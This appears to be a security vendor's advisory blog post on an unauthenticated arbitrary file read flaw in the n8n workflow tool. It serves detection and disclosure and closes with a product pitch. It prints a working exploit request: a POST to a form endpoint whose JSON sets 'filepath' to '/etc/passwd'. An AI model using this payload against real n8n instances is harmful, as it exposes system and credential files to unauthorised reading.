n8n (Ni8mare) Content-Type Confusion - Arbitrary File Read (CVE-2026-21858) S
- Dee Sehejpal BSc (HONS)
- 1 hour ago
- 1 min read
Application Details
n8n is a powerful, open-source workflow automation tool that lets you visually connect applications, APIs, and data to automate repetitive tasks, acting as a "digital assistant" for business processes.
Vulnerability
n8n is vulnerable to an arbitrary file read attack where an attacker could potentially access files through execution of certain form-based workflows.
Identification
A vulnerable workflow could grant access to an unauthenticated remote attacker, resulting in exposure of sensitive information stored on the system.
POST /form/82848bc4-5ea2-4e5a-8bb6-3c09b94a8c5d
{
"files": {
"field-0": {
"filepath": "/etc/passwd",
"originalFilename": "product-spec.pdf",
"mimeType": "text/plain",
"extension": ""
}
},
"data": [
"not really important"
],
"executionId": "not really important"
}Detection
By turning this into a traffic file and matching rule, we are able to detect arbitrary file read attempts to the application.
Coverage
Idappcom have created signature 8026715 along with a traffic file for this vulnerability.
References
Traffic IQ
If you are concerned that your business may be at risk of this vulnerability or others why not try out our Traffic IQ software which can scan your defences and report any issues. Learn more here: https://www.idappcom.co.uk/traffic-iq-professional